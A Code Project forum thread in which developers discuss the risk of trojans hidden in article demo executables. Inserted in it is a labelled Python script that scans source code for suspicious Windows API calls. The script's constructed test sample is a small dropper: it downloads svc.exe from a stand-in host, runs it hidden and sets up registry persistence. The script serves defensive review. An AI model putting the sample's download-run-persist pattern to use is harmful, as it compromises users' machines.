Security consideration

The Code Project, The Lounge
Tags: csharp, c++, security, tutorial
27 Posts, 14 Posters
#17 Chris Maunder

RichardBrock wrote:

    Think about this scenario - someone signs up to codeproject using a gmail address and an arbitrary username. The person then posts an article about a new MFC control, for example a pure win32 Ribbon control that does not require any .net components. The source code contains intentional omissions that make it impossible to compile, because the real objective is to get as many people as possible to download the demo executable and run it. The executable installs a trojan or SSH tunnel giving the author full access to the victim's computer, allowing for theft of source code, documents, emails etc. Antivirus won't detect the break-in; a personal firewall might, I guess it depends on how good the author is at coding. My point is - perhaps there is a rather wide open back door via article demos - and I am in no way suggesting that it's the responsibility of codeproject to police uploads, just merely raising the concern.

This is an issue for any executable (and many non-executable) downloads on the internet, and is precisely the reason we do not allow downloads that do not contain source code. I've also seen anti-virus software complain about demo downloads from CodeProject - not because the code contained a trojan, but because a trojan contained the code!

cheers, Chris Maunder The Code Project | Co-founder Microsoft C++ MVP
#18 BRShroyer

In reply to RichardBrock's post quoted above.

If someone were to ever try this, I bet the next CP contest would be to develop a botnet that would bury this guy so deep that the next three generations of his family wouldn't even be able to use a computer for as much as googling "When is this going to end?"

Brad Deja Moo - When you feel like you've heard the same bull before.
#19 Christopher Duncan

Nelek wrote:

    The best security is your own common sense. If a user is a very new member (none or very few posts, a short membership and directly one article), it is already a "warning". Most things or article contents are quite difficult to follow just with a demo app without the needed source, so if the source code doesn't compile... I just ignore the app.

    Regards. -------- M.D.V. ;) If something has a solution... Why do we have to worry about?. If it has no solution... For what reason do we have to worry about? Help me to understand what I'm saying, and I'll explain it better to you Rating helpful answers is nice, but saying thanks can be even nicer.

Then we are so totally screwed...

Christopher Duncan
www.PracticalUSA.com
Author of The Career Programmer and Unite the Tribes
Copywriting Services
#20 Christopher Duncan

In reply to Chris Maunder's post #17 above.

...and the dog merrily chases his tail.

Christopher Duncan
www.PracticalUSA.com
Author of The Career Programmer and Unite the Tribes
Copywriting Services
#21 Caslen

John M Drescher wrote:

    My point is the Norton/Endpoint with its realtime scanner and heuristics obviously did not detect these viruses to let them install themselves in these machines.

    John

That's what you get for using Norton Crapware ;P
#22 Nelek

In reply to BRShroyer's post #18 above.

:laugh: :laugh: :thumbsup:

Regards. -------- M.D.V. ;) If something has a solution... Why do we have to worry about?. If it has no solution... For what reason do we have to worry about? Help me to understand what I'm saying, and I'll explain it better to you Rating helpful answers is nice, but saying thanks can be even nicer.
#23 John M Drescher

In reply to Caslen's post #21 above.

It's not my choice. For the one laptop that is under my control we have an exclusive contract to use Endpoint. The others were home users.

John
#24 R Giskard Reventlov

Mark_Wallace wrote:

    digital man wrote:

        Maybe demos should be banned (how would that work?)

    By only having demos that are built by a trusted third party. A lot of work for the hamsters, though.

    I wanna be a eunuchs developer! Pass me a bread knife!

Ah, a bit like escrow, perhaps? Not bad: I suppose it could be a paid service that would earn CP some more gazillions and would certainly weed out some of the more, how can I put it... not terribly well thought out articles.

Tychotics: take us back to the moon "Life, for ever dying to be born afresh, for ever young and eager, will presently stand upon this earth as upon a footstool, and stretch out its realm amidst the stars." H. G. Wells
#25 John M Drescher

hammerstein05 wrote:

    A user of Code Project would (presumably) be presumed to be a developer. If you're reading an article, then you should at least be able to understand the content of the article and at least be at a level with the language it's in that you understand the demo you're about to download. I don't run code before reading through it and at least understanding where it's going, even if I don't understand all the concepts present. I also know enough networking code to spot it. If I try and build it and it doesn't work, I'll invariably delete it and mark the rating of the article one lower than I would have had the demo code worked as described by the article. I don't think it's a security risk, and I'm pretty sure a report of an article that had malicious content would be treated seriously and quickly by the admins on the site.

What if you were the first to review the code?

John
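The "read the source before you run the demo" habit hammerstein05 describes, and John's follow-up about being the first reviewer, turned into a small pre-build triage script. This is an added example, not code from the thread or from CodeProject: it walks an unpacked article source tree, flags references to Win32/.NET APIs used for network access, downloading, process creation, persistence and code injection, and says which files to read first. The category names, the `triage` verdicts and the two sample files are this example's own constructions. It is a reading aid, not a detector, and it cannot address the exact scenario RichardBrock raises, a demo executable that was never built from the posted source; nothing in a source scan can see that.

```python
"""Pre-build triage of a downloaded article source tree (added example).

Flags Win32/.NET API references worth reading before building or running
anything. Heuristic only: it does not prove the demo binary matches the source.
"""
import os
import re
import tempfile
from collections import defaultdict

# Real Win32/.NET identifiers; the grouping into categories is this example's own.
INDICATORS = [
    ("network", r"\b(?:WSAStartup|connect|send|recv|InternetOpen(?:Url)?[AW]?"
                r"|HttpOpenRequest[AW]?|WinHttpOpen|URLDownloadToFile[AW]?"
                r"|TcpClient|WebClient|HttpClient)\b"),
    ("process", r"\b(?:CreateProcess[AW]?|ShellExecute(?:Ex)?[AW]?|WinExec"
                r"|system|Process\.Start)\s*\("),
    ("persistence", r"CurrentVersion\\+Run"
                    r"|\b(?:RegSetValueEx[AW]?|CreateService[AW]?|SetWindowsHookEx[AW]?)\b"),
    ("injection", r"\b(?:VirtualAllocEx|WriteProcessMemory|CreateRemoteThread)\b"),
]
COMPILED = [(cat, re.compile(rx)) for cat, rx in INDICATORS]
SOURCE_EXT = {".c", ".cpp", ".cc", ".cxx", ".h", ".hpp", ".cs"}


def scan_source(text):
    """Return {category: [line numbers]} for one file's text.

    Whole-line // comments are skipped so a comment mentioning 'connect' is not
    counted; string literals are scanned, since registry paths and URLs live there.
    """
    hits = defaultdict(list)
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("//"):
            continue
        for category, rx in COMPILED:
            if rx.search(line):
                hits[category].append(lineno)
    return dict(hits)


def scan_tree(root):
    """Scan every source file under root; return {relative path: hits} for files with hits."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if os.path.splitext(name)[1].lower() not in SOURCE_EXT:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_source(fh.read())
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report


def triage(report):
    """'clean' (no hits), 'read' (isolated hits), or 'review' when network access
    is combined with process creation, persistence or injection: the
    download-and-run shape of a dropper."""
    cats = set()
    for hits in report.values():
        cats.update(hits)
    if "network" in cats and cats & {"process", "persistence", "injection"}:
        return "review"
    return "read" if cats else "clean"


# Constructed sample tree: a benign MFC control file and an "updater" a reader
# should spot. Neither is real CodeProject code.
SAMPLE_FILES = {
    "RibbonCtrl.cpp": (
        "// RibbonCtrl.cpp - constructed benign sample\n"
        '#include "stdafx.h"\n'
        '#include "RibbonCtrl.h"\n'
        "BOOL CRibbonCtrl::OnEraseBkgnd(CDC* pDC) { return TRUE; }\n"
        "void CRibbonCtrl::OnPaint() { CPaintDC dc(this); DrawTabs(&dc); }\n"
    ),
    "Updater.cpp": (
        "// Updater.cpp - constructed suspicious sample\n"
        "#include <wininet.h>\n"
        "#include <urlmon.h>\n"
        "void CheckForUpdates() {\n"
        '    HINTERNET h = InternetOpenA("RibbonDemo", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n'
        '    URLDownloadToFileA(NULL, "http://example.invalid/svc.exe", "svc.exe", 0, NULL);\n'
        '    ShellExecuteA(NULL, "open", "svc.exe", NULL, NULL, SW_HIDE);\n'
        "    HKEY hk;\n"
        '    RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run", 0, KEY_WRITE, &hk);\n'
        '    RegSetValueExA(hk, "RibbonSvc", 0, REG_SZ, (const BYTE*)"svc.exe", 8);\n'
        "    InternetCloseHandle(h);\n"
        "}\n"
    ),
    "README.txt": "Run RibbonDemo.exe to see the control. (Not a source file; not scanned.)\n",
}


def build_sample_tree():
    """Write the constructed sample files into a fresh temp dir; return its path."""
    root = tempfile.mkdtemp(prefix="cp_demo_")
    for name, body in SAMPLE_FILES.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    report = scan_tree(build_sample_tree())
    for path, hits in report.items():
        for cat, lines in hits.items():
            print(f"{path}: {cat} at lines {lines}")
    print("verdict:", triage(report))
```

Point `scan_tree` at the unpacked article archive instead of the sample directory to use it for real. A "review" verdict means read the flagged lines before building; a "clean" verdict means only that the source shows nothing of this shape, which says nothing about a prebuilt demo executable shipped alongside it.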
#26 Caslen

In reply to John M Drescher's post #23 above.

Luckily I've never been forced to use it at work, but I've never heard a good word said about it.
#27 hammerstein05

In reply to John M Drescher's post #25 above.

I was thinking more of a user reading the code and deeming the content to be malicious, than them actually running the content. If you were the first to read and you ran it without checking, then, whoops.